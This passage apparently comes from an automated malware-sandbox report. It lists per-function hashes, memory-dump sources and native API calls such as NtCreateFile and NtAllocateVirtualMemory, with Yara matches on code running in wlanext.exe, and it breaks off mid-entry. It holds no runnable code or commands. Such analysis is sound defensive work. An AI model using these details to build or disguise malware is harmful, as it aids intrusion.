                                                • Opcode ID: 78ea6de68626f20124fe02ef922ff891a68e89835297309caf8778eb70aef3de
                                                • Instruction ID: 728e0abc6ecbfb432af5d30934640af3adb8dbe595609fa7176205f239501293
                                                • Opcode Fuzzy Hash: 78ea6de68626f20124fe02ef922ff891a68e89835297309caf8778eb70aef3de
                                                • Instruction Fuzzy Hash: 4090027160544002D14171DA844460B5005B7E0341F51C422E0415559CC7B5885AA261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9A10, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 317a214486ed36e8bd5fd15e521c45979b2f34e4625a60a8f35840ba5248c21e
                                                • Instruction ID: c3ad7507c8ca39083fd8ea617ab3655934b8575d50c6feb407b03b2ba4f89793
                                                • Opcode Fuzzy Hash: 317a214486ed36e8bd5fd15e521c45979b2f34e4625a60a8f35840ba5248c21e
                                                • Instruction Fuzzy Hash: 4790027160540402D10161DA48087470005A7D0342F51C022A515455AEC7F5C8957571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9A80, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa989ac076767a8bf35cfb0179f442c452326e20a0aff67ad2a18db933322040
                                                • Instruction ID: 72b4554e8ab5f189e0620ccccdaddc2bfee474240d093dbc3cb22bad2b0ffad6
                                                • Opcode Fuzzy Hash: fa989ac076767a8bf35cfb0179f442c452326e20a0aff67ad2a18db933322040
                                                • Instruction Fuzzy Hash: 9C90026160544442D14162DA4804B0F4105A7E1242F91C02AA4146559CCAB588596761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013FAD30, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7a531ef658e025f61a5398fdb3ad7987ff7eb36140d1f0853713f8bb43efe81
                                                • Instruction ID: e0f004f86adb49c3f12257e0d4413ad32fb6a803726ff3d14ed8fa7b18b1b20f
                                                • Opcode Fuzzy Hash: d7a531ef658e025f61a5398fdb3ad7987ff7eb36140d1f0853713f8bb43efe81
                                                • Instruction Fuzzy Hash: E5900271E0900012914171DA48146464006B7E0781B55C022A0504559CCAF48A5963E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9520, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97ecb3f8f7f741a6bc63571048619f15f6467e05f6af16b7399537f7d256f198
                                                • Instruction ID: bc420ffaf0bc72fcac7f2a3847d1ce2466ab16629c2b1f8651dfb2bbc6d8e371
                                                • Opcode Fuzzy Hash: 97ecb3f8f7f741a6bc63571048619f15f6467e05f6af16b7399537f7d256f198
                                                • Instruction Fuzzy Hash: D99002E1605140924501A2DA8404B0A4505A7E0241B51C027E1044565CC6B58855A175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9560, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56e842d4c18db927a41b4d5bcb0333a26697c34ab17f3944d585ab177ba2e553
                                                • Instruction ID: 738035e2d57beb0a1b68fbcf05df0c8eddb89f23d8c35b9710471d150d4efa71
                                                • Opcode Fuzzy Hash: 56e842d4c18db927a41b4d5bcb0333a26697c34ab17f3944d585ab177ba2e553
                                                • Instruction Fuzzy Hash: 96900265625000020146A5DA060450B0445B7D6391391C026F1406595CC7B188696361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F95F0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74f9e53adf1c82243bb7483b9d967e449721041281885879bf4979cd2ad380f1
                                                • Instruction ID: ba71627fdc10d0ea7fd8af3d782e5727bf2ffde1a69c08fa723782fbb7131b48
                                                • Opcode Fuzzy Hash: 74f9e53adf1c82243bb7483b9d967e449721041281885879bf4979cd2ad380f1
                                                • Instruction Fuzzy Hash: 9190027160500802D10561DA48046860005A7D0341F51C022A601465AED7F588957171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9730, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2641efef22b319b6b1318a3eb0624e3ff7048d5646fe7f6707b785aac6c3ed6e
                                                • Instruction ID: 13dde40da5809c6462b9b04e28dcdb15a5f4ab17b8215bcb1968bf5cafc6d840
                                                • Opcode Fuzzy Hash: 2641efef22b319b6b1318a3eb0624e3ff7048d5646fe7f6707b785aac6c3ed6e
                                                • Instruction Fuzzy Hash: 78900261A0900402D14171DA54187060015A7D0241F51D022A0014559DC7F98A5976E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013FA710, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66fcbe32907c58b8d25fb62dbbf8627930160c73ba70e6bbea2fad2c2e3a1145
                                                • Instruction ID: 731090d927ea4a7ae5d42aa78fc926bb1f1630f76ed6d9d1c1681c165d766c36
                                                • Opcode Fuzzy Hash: 66fcbe32907c58b8d25fb62dbbf8627930160c73ba70e6bbea2fad2c2e3a1145
                                                • Instruction Fuzzy Hash: 36900271705000529501A6DA5804A4A4105A7F0341B51D026A4004559CC6F488656161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013FA770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a416e68d411016b5ae8de4ed5a6b7895a250ae3fe7b6cc5aeac9269e2a5e2043
                                                • Instruction ID: 89e34f3b86104ba13d7198f8bdadedaa405d804aa40681ed02ff5829c3ba9539
                                                • Opcode Fuzzy Hash: a416e68d411016b5ae8de4ed5a6b7895a250ae3fe7b6cc5aeac9269e2a5e2043
                                                • Instruction Fuzzy Hash: 2A90027560904442D50165DA5804A870005A7D0345F51D422A041459DDC7F48865B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9770, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eba3dfdae6d4831518ff796d61799406b09c986cca57e32b9432908ea3c67a37
                                                • Instruction ID: 8d773b436a29e26305b8daabb076577eda7d03d453b1bda79d5073f273924d91
                                                • Opcode Fuzzy Hash: eba3dfdae6d4831518ff796d61799406b09c986cca57e32b9432908ea3c67a37
                                                • Instruction Fuzzy Hash: B590026160904442D10165DA5408A060005A7D0245F51D022A105459ADC7B58855B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9760, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71ac704a6342b5ef783d5c0f16edad52c9bce15dc9e3860ce3ca046129548f07
                                                • Instruction ID: dc6887bb1064d7d67993a75c42557b82a6963d3c9bbce837f55402f06dddbe41
                                                • Opcode Fuzzy Hash: 71ac704a6342b5ef783d5c0f16edad52c9bce15dc9e3860ce3ca046129548f07
                                                • Instruction Fuzzy Hash: F690027160500403D10161DA55087070005A7D0241F51D422A041455DDD7F688557161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9FE0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 972d06a2f26ad29323fb4b819d5c7f6f8b45ec0afcbf293bd65b26bfa424c937
                                                • Instruction ID: 021b40cfbc5fc1bb22203cca1631537ce21537e8a7eb4fcc6c01c7ba83c91287
                                                • Opcode Fuzzy Hash: 972d06a2f26ad29323fb4b819d5c7f6f8b45ec0afcbf293bd65b26bfa424c937
                                                • Instruction Fuzzy Hash: B990027171514402D11161DA84047060005A7D1241F51C422A081455DDC7F588957162
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9610, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 787440e70d1488da9ce08353e584e7d9d89ed8d864a6d92ccb3610d8decd06b6
                                                • Instruction ID: 165b91137f101bed9c8d62c0c4b5bb92a6ee076ed822e2ed479cbc0b9280f496
                                                • Opcode Fuzzy Hash: 787440e70d1488da9ce08353e584e7d9d89ed8d864a6d92ccb3610d8decd06b6
                                                • Instruction Fuzzy Hash: 1B900271A0900802D15171DA44147460005A7D0341F51C022A0014659DC7F58A5976E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9650, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7303e91e71f3cdea21a4bb90d33529c9944ca8365fe08c4c7d1d03769577fe5c
                                                • Instruction ID: c77342b14926150aa2424306610af67b9a650b02000808e93db813f695e94d2b
                                                • Opcode Fuzzy Hash: 7303e91e71f3cdea21a4bb90d33529c9944ca8365fe08c4c7d1d03769577fe5c
                                                • Instruction Fuzzy Hash: 5B90027160904842D14171DA4404A460015A7D0345F51C022A0054699DD7B58D59B6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F96D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4085c00c96a7674ed1eaaf8acb13548a76b4338bb7e5d142f7f2fd30b1457994
                                                • Instruction ID: be4ccc1fea1470d46844a7a6056f8cf6075f7748bf8f9ae10854c9126cece1f6
                                                • Opcode Fuzzy Hash: 4085c00c96a7674ed1eaaf8acb13548a76b4338bb7e5d142f7f2fd30b1457994
                                                • Instruction Fuzzy Hash: 4590027160500842D10161DA4404B460005A7E0341F51C027A0114659DC7B5C8557561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9670, Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 57eb646065f0a8f27c772a2c545156dc597530bb46e81b78a329c24368998b04
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0144FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0144FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0144FE2B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: f248511b15d81b1a8dfdc2d37aa06057a5a24662bbd58b612de45f8a5f5a55b6
                                                • Instruction ID: b814673143e7402979743169ea80a02bc02f4ccaa48f81df11f56246f8031515
                                                • Opcode Fuzzy Hash: f248511b15d81b1a8dfdc2d37aa06057a5a24662bbd58b612de45f8a5f5a55b6
                                                • Instruction Fuzzy Hash: 4EF0FC321401017FEB201A4ADC05F23BF5ADB54731F240319F618555E1D972F82086F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: wlanext.exe PID: 4732 Parent PID: 3472 wlanext.exeCOMMON

                                                Executed Functions

                                                Function 02EC9D70, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02EC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02EC9DBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: a8a716b92347516ac5a1ed4619dab4bb244acacc914ba8718549bc61c24436d6
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 6BF0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9E20, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(02EC4D42,5EB6522D,FFFFFFFF,02EC4A01,?,?,02EC4D42,?,02EC4A01,FFFFFFFF,5EB6522D,02EC4D42,?,00000000), ref: 02EC9E65
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: ef7a18c1a00f24faa4d00ddfa0061edc7eebf90110c9847c2d278dffab1f022c
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: D1F0A4B2200208ABCB18DF89DC81EEB77ADAF8C754F158258BA1D97251D630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9E1F, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(02EC4D42,5EB6522D,FFFFFFFF,02EC4A01,?,?,02EC4D42,?,02EC4A01,FFFFFFFF,5EB6522D,02EC4D42,?,00000000), ref: 02EC9E65
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: e5ba2e174c167c0608164dd6245ee7a4f633cad78ada76774a199168fd9a92f1
                                                • Instruction ID: 8ecb2316e1ea3dc35c9777041575cfbc388c4d502f7f287cdbfe8916a6d7c09b
                                                • Opcode Fuzzy Hash: e5ba2e174c167c0608164dd6245ee7a4f633cad78ada76774a199168fd9a92f1
                                                • Instruction Fuzzy Hash: 77F0A4B2200108AFCB18DF99DC81EEB77A9EF8C354F158258BA1DE7251D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9F4C, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EB2D11,00002000,00003000,00000004), ref: 02EC9F89
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 45bbb3ed9fc7c98c09c2350257c3cef11270c3ce729621abb9526321e9b2cce4
                                                • Instruction ID: d6cbf47496ed1fc48d0f8bc19bd3eaeba5d113229c30c08ad8a9c1c19745a16e
                                                • Opcode Fuzzy Hash: 45bbb3ed9fc7c98c09c2350257c3cef11270c3ce729621abb9526321e9b2cce4
                                                • Instruction Fuzzy Hash: 8AF01CB1200208ABDB18DF88DC85EE777ADEF8C350F158259FE5897251C635E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9F50, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EB2D11,00002000,00003000,00000004), ref: 02EC9F89
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 2ce40758bc52a9199eac288d06506106a4c9f7f3b797ec7837a5d7a98f751aae
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 87F015B2200208ABCB18DF89DC81EAB77ADAF88750F118158BE0897241C630F811CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9EA0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(02EC4D20,?,?,02EC4D20,00000000,FFFFFFFF), ref: 02EC9EC5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 0cce95c948f10f6c4a0c41f562139528f95008b3d67b6348812d4bbbfb187bfa
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 5AD012752402146BD714EFD8DC45EA7775DEF44750F154459BA589B241C530F90086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02EC9DC2, Relevance: 1.5, APIs: 1, Instructions: 9filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02EC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02EC9DBD
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Offset: 02EB0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4caea93c985a3daf38a5c759d67712257434c1700a17d71f4b93b9c902b04769
                                                • Instruction ID: 4837a1dd719c8a4dc920d35d8a289f5bdad07816177588a33694793d7f9ee7ae
                                                • Opcode Fuzzy Hash: 4caea93c985a3daf38a5c759d67712257434c1700a17d71f4b93b9c902b04769
                                                • Instruction Fuzzy Hash: BAB01257D447340A1C0852F428499B5074C81C06E6324505FD90C67A05551E1C2251D5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
                                                • Instruction ID: 0b9d1e64fcf88c76514d831c9e4d0f36f6af2cdf2fc1bdce64357a0f8b2fad6f
                                                • Opcode Fuzzy Hash: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
                                                • Instruction Fuzzy Hash: 9490026132184846E210A56A4C24B07004597D4343F51C125A4144554CCE5588617561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
                                                • Instruction ID: 3bc50bab33de2afc71780a0382e526a9149a6b08a944ac84c4339665963b8fa7
                                                • Opcode Fuzzy Hash: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
                                                • Instruction Fuzzy Hash: 4B9002B131104C06E150B15A4414746004597D4341F51C021A9054554E8B998DD576A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 037599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
                                                • Instruction ID: 7d8d6721549ee7d9523a88bd37865b980559be816b47d48204c5c3a07ee476bd
                                                • Opcode Fuzzy Hash: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
                                                • Instruction Fuzzy Hash: 379002A135104C46E110A15A4424B060045D7E5341F51C025E5054554D8B59CC527166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
                                                • Instruction ID: 47d406771d58ac256c24d2b1157f4c93a15902b71a843278a402b9bd7bb22354
                                                • Opcode Fuzzy Hash: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
                                                • Instruction Fuzzy Hash: F590027131104C17E121A15A4514707004997D4281F91C422A4414558D9B968952B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
                                                • Instruction ID: 14f6b415d84739807130a0ff3e01726690c39cbba145d46a4f57b0b072d9a700
                                                • Opcode Fuzzy Hash: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
                                                • Instruction Fuzzy Hash: 42900261352089566555F15A44145074046A7E4281791C022A5404950C8A669856F661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
                                                • Instruction ID: 2a24bdf7fea61444264777ac52e3d622e510c323fcd4c97a392cca305236e20b
                                                • Opcode Fuzzy Hash: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
                                                • Instruction Fuzzy Hash: 8F90027131104C06E110A59A5418646004597E4341F51D021A9014555ECBA588917171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03759FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true
                                                • Associated: 00000003.00000002.491649065.000000000380B000.00000040.00000001.sdmp Download File
                                                • Associated: 00000003.00000002.491656609.000000000380F000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
                                                • Instruction ID: 951244609dfabead26ae9d8497ee311f699ca72dda08dcc8174f98905259da08
                                                • Opcode Fuzzy Hash: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
